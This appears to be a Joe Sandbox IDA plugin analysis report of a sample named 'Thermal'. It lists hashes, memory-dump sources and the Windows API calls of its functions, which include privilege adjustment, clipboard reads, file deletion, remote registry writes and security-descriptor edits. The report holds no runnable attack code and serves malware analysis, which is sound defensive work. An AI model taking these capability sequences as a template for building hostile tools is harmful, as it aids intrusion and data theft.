                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
                                                • Instruction ID: 74024ab245ae7a00f49aa614dfe4aca3ca7616f949740f75056aa7dc31baa959
                                                • Opcode Fuzzy Hash: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
                                                • Instruction Fuzzy Hash: 49B09234000600579E781F3C99481A933A168423A9BDC1B82E478856F1963D884FA920
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction ID: b2d35f90c2f9aa07c9b2b753bb7626d1facca782fed56f808c62141ea5f2e39c
                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction Fuzzy Hash: 50B0927644020CB7CE022A82FC03E593B299B40A68F408020FB0C1C172A677A6A09689
                                                APIs
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 007DD842
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: fba2117576c324121e5e048ee4d93164ac6b74a68bffdb213f4e35c62f61b986
                                                • Instruction ID: c8e46fcfeaff71712efead51a18f8447fc3d19cd13110f3ae314f4fe8d90ec92
                                                • Opcode Fuzzy Hash: fba2117576c324121e5e048ee4d93164ac6b74a68bffdb213f4e35c62f61b986
                                                • Instruction Fuzzy Hash: 00716F30204301CFC724EF64D495A6AB7F5AF98354F44462EF9969B3A2DB38ED05CB52
                                                APIs
                                                  • Part of subcall function 007D4005: FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                  • Part of subcall function 007D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                  • Part of subcall function 007D4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D40DD
                                                  • Part of subcall function 007D4005: FindClose.KERNEL32(00000000), ref: 007D40F4
                                                • GetLastError.KERNEL32 ref: 007DC292
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2191629493-0
                                                • Opcode ID: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
                                                • Instruction ID: 64406521df6fb31e6bda35442312506234dae8f3895a92daad87db101a36152d
                                                • Opcode Fuzzy Hash: 04f6ddc5be352773ecbf42d7337a7c68d5fee979fb211aab806c2edaa72a6e75
                                                • Instruction Fuzzy Hash: FFF058323102108FCB21EB59D859B6AB7E5AF88360F05805AFA499B352CB78B801CB94
                                                APIs
                                                • CloseHandle.KERNEL32(?,?,00000000,007B2F8B), ref: 007842EF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: c22d16daf6fc8dfa8df03355ceb1a66be6436f285989d27b47a496385da315c9
                                                • Instruction ID: a92c33cdafe261a34a17f8788bb445463a88fc521ab6d19c197452360dcb2b9b
                                                • Opcode Fuzzy Hash: c22d16daf6fc8dfa8df03355ceb1a66be6436f285989d27b47a496385da315c9
                                                • Instruction Fuzzy Hash: 04E09275444B02CFC7315F1AE804412FBE4FFE13613214A2EE0E692660D7B4589A8B50
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FD208
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD249
                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007FD28E
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD2B8
                                                • SendMessageW.USER32 ref: 007FD2E1
                                                • _wcsncpy.LIBCMT ref: 007FD359
                                                • GetKeyState.USER32(00000011), ref: 007FD37A
                                                • GetKeyState.USER32(00000009), ref: 007FD387
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FD39D
                                                • GetKeyState.USER32(00000010), ref: 007FD3A7
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FD3D0
                                                • SendMessageW.USER32 ref: 007FD3F7
                                                • SendMessageW.USER32(?,00001030,?,007FB9BA), ref: 007FD4FD
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FD513
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FD526
                                                • SetCapture.USER32(?), ref: 007FD52F
                                                • ClientToScreen.USER32(?,?), ref: 007FD594
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FD5A1
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FD5BB
                                                • ReleaseCapture.USER32 ref: 007FD5C6
                                                • GetCursorPos.USER32(?), ref: 007FD600
                                                • ScreenToClient.USER32(?,?), ref: 007FD60D
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD669
                                                • SendMessageW.USER32 ref: 007FD697
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD6D4
                                                • SendMessageW.USER32 ref: 007FD703
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD724
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD733
                                                • GetCursorPos.USER32(?), ref: 007FD753
                                                • ScreenToClient.USER32(?,?), ref: 007FD760
                                                • GetParent.USER32(?), ref: 007FD780
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD7E9
                                                • SendMessageW.USER32 ref: 007FD81A
                                                • ClientToScreen.USER32(?,?), ref: 007FD878
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD8A8
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD8D2
                                                • SendMessageW.USER32 ref: 007FD8F5
                                                • ClientToScreen.USER32(?,?), ref: 007FD947
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD97B
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FDA17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3977979337-4164748364
                                                • Opcode ID: c07d03a95a73f845d7c4e17774ab57859c30931764d611f50e4df0368d151015
                                                • Instruction ID: d34f0fbacebad5101ca227e3a42fe8b5d47c2be7c4ca67389a61e1190d6f0e56
                                                • Opcode Fuzzy Hash: c07d03a95a73f845d7c4e17774ab57859c30931764d611f50e4df0368d151015
                                                • Instruction Fuzzy Hash: E2427B702042499FD724DF28C848BAABBE6FF89310F140619F7A5873A1D775EC54DB91
                                                APIs
                                                  • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                  • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                  • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                • _memset.LIBCMT ref: 007C8F71
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C8FC3
                                                • CloseHandle.KERNEL32(?), ref: 007C8FD4
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C8FEB
                                                • GetProcessWindowStation.USER32 ref: 007C9004
                                                • SetProcessWindowStation.USER32(00000000), ref: 007C900E
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C9028
                                                  • Part of subcall function 007C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
                                                  • Part of subcall function 007C8DE9: CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: 484ee493b7dd3c900340f10693357189a7e3568a49101f2e345a6283fb8203c6
                                                • Instruction ID: 452fbd277c5de89b0264ee76da6235071f376f70c3d4d13ad6be50efb56a8756
                                                • Opcode Fuzzy Hash: 484ee493b7dd3c900340f10693357189a7e3568a49101f2e345a6283fb8203c6
                                                • Instruction Fuzzy Hash: D08148B190420DBFDF519FA4DC4AFEE7B79BF04304F08411DFA10A6261DB3A8A159B61
                                                APIs
                                                • OpenClipboard.USER32(00800980), ref: 007E465C
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 007E466A
                                                • GetClipboardData.USER32(0000000D), ref: 007E4672
                                                • CloseClipboard.USER32 ref: 007E467E
                                                • GlobalLock.KERNEL32(00000000), ref: 007E469A
                                                • CloseClipboard.USER32 ref: 007E46A4
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E46B9
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007E46C6
                                                • GetClipboardData.USER32(00000001), ref: 007E46CE
                                                • GlobalLock.KERNEL32(00000000), ref: 007E46DB
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E470F
                                                • CloseClipboard.USER32 ref: 007E481F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                • Instruction ID: db46a3a4eea26a13d05df09005d46a0f859d3174f9f11b455da9284ed5d986fb
                                                • Opcode Fuzzy Hash: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                • Instruction Fuzzy Hash: AF51DC31245381ABD300EF61DC89F6E73A8BF98B40F000529F65AD22E1DF78D8058F66
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007DF5F9
                                                • _wcscmp.LIBCMT ref: 007DF60E
                                                • _wcscmp.LIBCMT ref: 007DF625
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DF637
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 007DF651
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF669
                                                • FindClose.KERNEL32(00000000), ref: 007DF674
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF690
                                                • _wcscmp.LIBCMT ref: 007DF6B7
                                                • _wcscmp.LIBCMT ref: 007DF6CE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF6E0
                                                • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF6FE
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF708
                                                • FindClose.KERNEL32(00000000), ref: 007DF715
                                                • FindClose.KERNEL32(00000000), ref: 007DF727
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*$S}
                                                • API String ID: 1803514871-2863189289
                                                • Opcode ID: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                • Instruction ID: 8165a75c1f5ed666bc5abf5a910d83f9dab933f21b9d68b8b93cd01af3c5fd05
                                                • Opcode Fuzzy Hash: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                • Instruction Fuzzy Hash: 00319571641219BADF509FB4EC4DAEE77BCEF09321F540166F816E22A0DB38DA44DE60
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DCDD0
                                                • FindClose.KERNEL32(00000000), ref: 007DCE24
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE49
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE60
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DCE87
                                                • __swprintf.LIBCMT ref: 007DCED3
                                                • __swprintf.LIBCMT ref: 007DCF16
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • __swprintf.LIBCMT ref: 007DCF6A
                                                  • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                • __swprintf.LIBCMT ref: 007DCFB8
                                                  • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 00793943
                                                  • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 0079395B
                                                • __swprintf.LIBCMT ref: 007DD007
                                                • __swprintf.LIBCMT ref: 007DD056
                                                • __swprintf.LIBCMT ref: 007DD0A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: 548f6f5047056131bd2d94f935f01e96adf2e1aba9e1f5be2448148bcdb36671
                                                • Instruction ID: 1bce222e9a643b1aa5f505217226e0306c9372204d89ad3c560e6eca9d40d9cd
                                                • Opcode Fuzzy Hash: 548f6f5047056131bd2d94f935f01e96adf2e1aba9e1f5be2448148bcdb36671
                                                • Instruction Fuzzy Hash: 28A13DB1404305EBD715EBA4D989DAFB7ECFF94700F404919F589C6191EB38EA09CBA2
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0FB3
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00800980,00000000,?,00000000,?,?), ref: 007F1021
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F1069
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F10F2
                                                • RegCloseKey.ADVAPI32(?), ref: 007F1412
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F141F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 6b9dbf933e559f83a1ccc86d54cadff52fa983d56f61e94f4b26fe685c3b4d27
                                                • Instruction ID: 3c5b974fb452d10821406128dd331c05df517947c58689cab352f6ef24fbcc54
                                                • Opcode Fuzzy Hash: 6b9dbf933e559f83a1ccc86d54cadff52fa983d56f61e94f4b26fe685c3b4d27
                                                • Instruction Fuzzy Hash: B1022675200615DFCB24EF25C855A2AB7E5FF89710F04895CFA9A9B362CB38EC41CB91
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007DF756
                                                • _wcscmp.LIBCMT ref: 007DF76B
                                                • _wcscmp.LIBCMT ref: 007DF782
                                                  • Part of subcall function 007D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D4890
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF7B1
                                                • FindClose.KERNEL32(00000000), ref: 007DF7BC
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF7D8
                                                • _wcscmp.LIBCMT ref: 007DF7FF
                                                • _wcscmp.LIBCMT ref: 007DF816
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF828
                                                • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF846
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF850
                                                • FindClose.KERNEL32(00000000), ref: 007DF85D
                                                • FindClose.KERNEL32(00000000), ref: 007DF86F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*$j}
                                                • API String ID: 1824444939-110696414
                                                • Opcode ID: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                • Instruction ID: 1978482bd5678b78cc21e95c87b5d2ed0da2f6fc54aeacf1964e96f8f0c223de
                                                • Opcode Fuzzy Hash: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                • Instruction Fuzzy Hash: 5231B871501219BEDF10ABB4EC48ADE77BCEF09321F104166E815E63A1DB38DE459F51
                                                APIs
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                  • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                  • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                  • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                  • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                  • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                  • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                  • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8931
                                                • _memset.LIBCMT ref: 007C8946
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8965
                                                • GetLengthSid.ADVAPI32(?), ref: 007C8976
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C89B3
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C89CF
                                                • GetLengthSid.ADVAPI32(?), ref: 007C89EC
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C89FB
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8A02
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8A23
                                                • CopySid.ADVAPI32(00000000), ref: 007C8A2A
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8A5B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8A81
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8A95
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                • Instruction ID: 2b773c433b1d5d5d8a16738fd1dc5c8020f4d99afeda8f18582fbacd97542c53
                                                • Opcode Fuzzy Hash: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                • Instruction Fuzzy Hash: C4610675A00209EFDF40DFA5DC45FEEBB79BB44300F04812EE915AA291DB399A15CFA1
                                                APIs
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0B0C
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F0BAB
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F0C43
